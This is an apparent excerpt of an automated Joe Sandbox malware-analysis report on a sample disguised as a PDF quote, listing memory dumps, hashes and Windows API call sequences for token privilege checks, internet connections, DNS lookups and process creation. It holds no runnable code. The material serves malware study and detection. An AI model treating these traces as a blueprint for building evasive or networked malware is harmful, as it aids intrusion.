                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 000a4de910f34c5543c7973794602533f3d5974277ce783a96289c3fc19cf857
                                                                    • Instruction ID: 23595a16e4386dfd7e52230ddc025e70224058f71118d1c5cbaab92a4dc9dbbd
                                                                    • Opcode Fuzzy Hash: 000a4de910f34c5543c7973794602533f3d5974277ce783a96289c3fc19cf857
                                                                    • Instruction Fuzzy Hash: 13313A72900208AFCB00EFA5D9859EFB7FDEF98304F10506AE511F7242EA759E058BA1
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • GetCursorPos.USER32(?), ref: 00EEC53C
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E9BB2B,?,?,?,?,?), ref: 00EEC551
                                                                    • GetCursorPos.USER32(?), ref: 00EEC59E
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E9BB2B,?,?,?), ref: 00EEC5D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: 9218281400760b4e1377eb2bd852a7cabcc132328dd0860d5b906a93da99e798
                                                                    • Instruction ID: 652d91de5ed40679f13a5ca34c526baa089e94bf39d90143c9b3648e1ba2a00f
                                                                    • Opcode Fuzzy Hash: 9218281400760b4e1377eb2bd852a7cabcc132328dd0860d5b906a93da99e798
                                                                    • Instruction Fuzzy Hash: 0D31F53520055CAFCB21CF55C898EEA7BF5EB49310F104069F905AB2A1D331AD55DFA0
                                                                    APIs
                                                                      • Part of subcall function 00EB8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EB8449
                                                                      • Part of subcall function 00EB8432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EB8453
                                                                      • Part of subcall function 00EB8432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EB8462
                                                                      • Part of subcall function 00EB8432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EB8469
                                                                      • Part of subcall function 00EB8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EB847F
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EB89CB
                                                                    • _memcmp.LIBCMT ref: 00EB89EE
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EB8A24
                                                                    • HeapFree.KERNEL32(00000000), ref: 00EB8A2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    • Opcode ID: 0090705a81b1b03064ba093a2b3b3295328e3c5b8230c7be5f38c93bf38d22ae
                                                                    • Instruction ID: e02ff902848c5ac44ce99235e6aabc013a02191aef1a3726fc3a1b924fba67c7
                                                                    • Opcode Fuzzy Hash: 0090705a81b1b03064ba093a2b3b3295328e3c5b8230c7be5f38c93bf38d22ae
                                                                    • Instruction Fuzzy Hash: B4218C71E41109EFDB10DFA4CA45BEEB7B8EF45315F1580AAE458BB241EB30AA09CF51
                                                                    APIs
                                                                    • __setmode.LIBCMT ref: 00E80B2E
                                                                      • Part of subcall function 00E65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EC793F,?,?,00000000), ref: 00E65B8C
                                                                      • Part of subcall function 00E65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EC793F,?,?,00000000,?,?), ref: 00E65BB0
                                                                    • _fprintf.LIBCMT ref: 00E80B65
                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00EB6111
                                                                      • Part of subcall function 00E84C1A: _flsall.LIBCMT ref: 00E84C33
                                                                    • __setmode.LIBCMT ref: 00E80B9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                    • String ID:
                                                                    • API String ID: 521402451-0
                                                                    • Opcode ID: c88ad630c7bfb9c2821a5fb7cbe7228fb9dbad215935a441699682caf01ca920
                                                                    • Instruction ID: 850be23117b72c0b39d6f88074735768569ac90ca1ac6ec6b0e9e93931b3e016
                                                                    • Opcode Fuzzy Hash: c88ad630c7bfb9c2821a5fb7cbe7228fb9dbad215935a441699682caf01ca920
                                                                    • Instruction Fuzzy Hash: AE112472A042097EDB05B7A4AC46DFEBBEDDF45320F14206AF10CB71D2EE31484647A5
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ED18B9
                                                                      • Part of subcall function 00ED1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ED1962
                                                                      • Part of subcall function 00ED1943: InternetCloseHandle.WININET(00000000), ref: 00ED19FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: cd7ae356dfd08db48903fed885d97c6d94fe48f65b9c4ba096c17dcd93f2237d
                                                                    • Instruction ID: 86ba329071379c0e7de9a540a47296dbb454816929b8b755a37dc4df622a9e3e
                                                                    • Opcode Fuzzy Hash: cd7ae356dfd08db48903fed885d97c6d94fe48f65b9c4ba096c17dcd93f2237d
                                                                    • Instruction Fuzzy Hash: 9121A175200705BFEB159F61DC20FBAB7A9FF89700F10502BFA15AA750DB71D812A791
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,00EEFAC0), ref: 00EC3AA8
                                                                    • GetLastError.KERNEL32 ref: 00EC3AB7
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EC3AC6
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00EEFAC0), ref: 00EC3B23
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: 7628b2e7b4c9244eceab82ba192765e7dc749eb2b3a95d8801e56c133f4e1742
                                                                    • Instruction ID: 1b444c4260e5b8a1e06bee88425bc590c5cef3979e7cf02f71545e48367ee687
                                                                    • Opcode Fuzzy Hash: 7628b2e7b4c9244eceab82ba192765e7dc749eb2b3a95d8801e56c133f4e1742
                                                                    • Instruction Fuzzy Hash: 4F2196305083059FC310DF35D980D9AB7E4EF55768F149A1EF499E72A1DB319E0ACB82
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E95281
                                                                      • Part of subcall function 00E8588C: __FF_MSGBANNER.LIBCMT ref: 00E858A3
                                                                      • Part of subcall function 00E8588C: __NMSG_WRITE.LIBCMT ref: 00E858AA
                                                                      • Part of subcall function 00E8588C: RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00E80F53,?), ref: 00E858CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: b09fdc27eea3ebefd0e70ccc8793795947e2d27e7d3b4d7fa4777778ed4aeeb0
                                                                    • Instruction ID: 75c8a44396cdaf0d05256f1d620203c0bf23da5651b18aa9c160922ac021c68d
                                                                    • Opcode Fuzzy Hash: b09fdc27eea3ebefd0e70ccc8793795947e2d27e7d3b4d7fa4777778ed4aeeb0
                                                                    • Instruction Fuzzy Hash: 0E11A373501A19AFCF323FB4AD4569E7BE8AB02364B206539FD0CBA160DE348D408791
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00E64560
                                                                      • Part of subcall function 00E6410D: _memset.LIBCMT ref: 00E6418D
                                                                      • Part of subcall function 00E6410D: _wcscpy.LIBCMT ref: 00E641E1
                                                                      • Part of subcall function 00E6410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E641F1
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00E645B5
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E645C4
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E9D5FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
                                                                    • Opcode ID: 6a713dbb47f30f1aeba4aa94d83e2fd34e876bc29b15cc419aef112cfe8bbd41
                                                                    • Instruction ID: e3e4fa68e0427ac04ec866cd4fff6acd3ecec229307649753b285ff6c7463d8c
                                                                    • Opcode Fuzzy Hash: 6a713dbb47f30f1aeba4aa94d83e2fd34e876bc29b15cc419aef112cfe8bbd41
                                                                    • Instruction Fuzzy Hash: 6D21C8B0948798DFEB329B24DC55BE7BBEC9F0130CF04109EE69A7A181D7741A848B51
                                                                    APIs
                                                                      • Part of subcall function 00E65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EC793F,?,?,00000000), ref: 00E65B8C
                                                                      • Part of subcall function 00E65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EC793F,?,?,00000000,?,?), ref: 00E65BB0
                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00ED64AF
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED64BA
                                                                    • _memmove.LIBCMT ref: 00ED64E7
                                                                    • inet_ntoa.WSOCK32(?), ref: 00ED64F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 1504782959-0
                                                                    • Opcode ID: 248f57ebcd72f8ec18a6912a9cd16de3537efab5a1ef03e09211c8932bba7e2c
                                                                    • Instruction ID: c20cbf8750aab3baa3c8c0b778b766527864a2fa21b0678e0e0e2fab7d611a29
                                                                    • Opcode Fuzzy Hash: 248f57ebcd72f8ec18a6912a9cd16de3537efab5a1ef03e09211c8932bba7e2c
                                                                    • Instruction Fuzzy Hash: 8C111C32A00108AFCB04EBA5ED96DEEB7F9EF44350B145065F506B72A2DB31AE14CB65
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EB8E23
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EB8E35
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EB8E4B
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EB8E66
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 18552e3a6bc531cb7b981a6af437009dfab0905e0e3a64a13969b91d3aedb3e2
                                                                    • Instruction ID: 46f015d48d5cc290259749c6ec5ea55e77558901264771da835aec6c1a214ac9
                                                                    • Opcode Fuzzy Hash: 18552e3a6bc531cb7b981a6af437009dfab0905e0e3a64a13969b91d3aedb3e2
                                                                    • Instruction Fuzzy Hash: 71112A79901219FFEB11DFA5CD85EDEBBB8FB48710F204095EA04B7290DA71AE10DB94
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00E612D8
                                                                    • GetClientRect.USER32(?,?), ref: 00E9B77B
                                                                    • GetCursorPos.USER32(?), ref: 00E9B785
                                                                    • ScreenToClient.USER32(?,?), ref: 00E9B790
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: f78c28663d98eac30e377ab1170876d0df9b52cf0d20e20a6c1a0d98532c727f
                                                                    • Instruction ID: d657f5f9a64097f6cb35f8462560cf426537d0bfdf37f05dafd00c363fc1bd54
                                                                    • Opcode Fuzzy Hash: f78c28663d98eac30e377ab1170876d0df9b52cf0d20e20a6c1a0d98532c727f
                                                                    • Instruction Fuzzy Hash: 3E115835A0005DEFCB11DFA8E8999FE77B8EB05340F0044A6FA01F7260C730BA55ABA5
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EC001E,?,00EC1071,?,00008000), ref: 00EC1490
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EC001E,?,00EC1071,?,00008000), ref: 00EC14B5
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EC001E,?,00EC1071,?,00008000), ref: 00EC14BF
                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00EC001E,?,00EC1071,?,00008000), ref: 00EC14F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 2dadab41a4e8c1c6c24affd49ba422a9c9c261ecb21b5e52a1c324f003ec516c
                                                                    • Instruction ID: 1c776373ebc35c1009d259043e0cb1b8dda519fab359717c6f8eb08b3d62c01b
                                                                    • Opcode Fuzzy Hash: 2dadab41a4e8c1c6c24affd49ba422a9c9c261ecb21b5e52a1c324f003ec516c
                                                                    • Instruction Fuzzy Hash: 56118231C0156DDBCF049FA5DA84FEDBB74FF0A712F014199E950B6242CB319561CB91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                    • Instruction ID: 339e45d94717f1992231bca45c80134fd4c277a19e620adc8cf7496b1d5d33cf
                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                    • Instruction Fuzzy Hash: D2019A3206914EBBCF165E85CC05CEE3F66BF18384B099415FE9869131C336C9B5AB81
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00EEB318
                                                                    • ScreenToClient.USER32(?,?), ref: 00EEB330
                                                                    • ScreenToClient.USER32(?,?), ref: 00EEB354
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EEB36F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: bdea012eef0d34ed6244a4e98bc830da4e81a1311d65f23a5e80c81c1409dd33
                                                                    • Instruction ID: 4836513efa90faa12d093137fdd1d3ceabd083cc73b48117e1b8a8cb6e7e432d
                                                                    • Opcode Fuzzy Hash: bdea012eef0d34ed6244a4e98bc830da4e81a1311d65f23a5e80c81c1409dd33
                                                                    • Instruction Fuzzy Hash: 98114675D0024EEFDB41CF99D4849EEBBB5FB08310F108166E915E3220D775AA558F91
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EEB678
                                                                    • _memset.LIBCMT ref: 00EEB687
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F26F20,00F26F64), ref: 00EEB6B6
                                                                    • CloseHandle.KERNEL32 ref: 00EEB6C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    • Opcode ID: a5772a2a57a7058c489a89b6c45b56c3ff4f4ede9dff2703ecedbd672ce219de
                                                                    • Instruction ID: 59df4b5fadb82399bc2d1b88ef1ff20bef85a824b34e2c29dc797ee6e80f6c39
                                                                    • Opcode Fuzzy Hash: a5772a2a57a7058c489a89b6c45b56c3ff4f4ede9dff2703ecedbd672ce219de
                                                                    • Instruction Fuzzy Hash: 38F05EB2640358BEEA202761BD46FBB3A9CEB08354F004024FB08E91A6E7715C019BA8
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00EC6C8F
                                                                      • Part of subcall function 00EC776D: _memset.LIBCMT ref: 00EC77A2
                                                                    • _memmove.LIBCMT ref: 00EC6CB2
                                                                    • _memset.LIBCMT ref: 00EC6CBF
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00EC6CCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
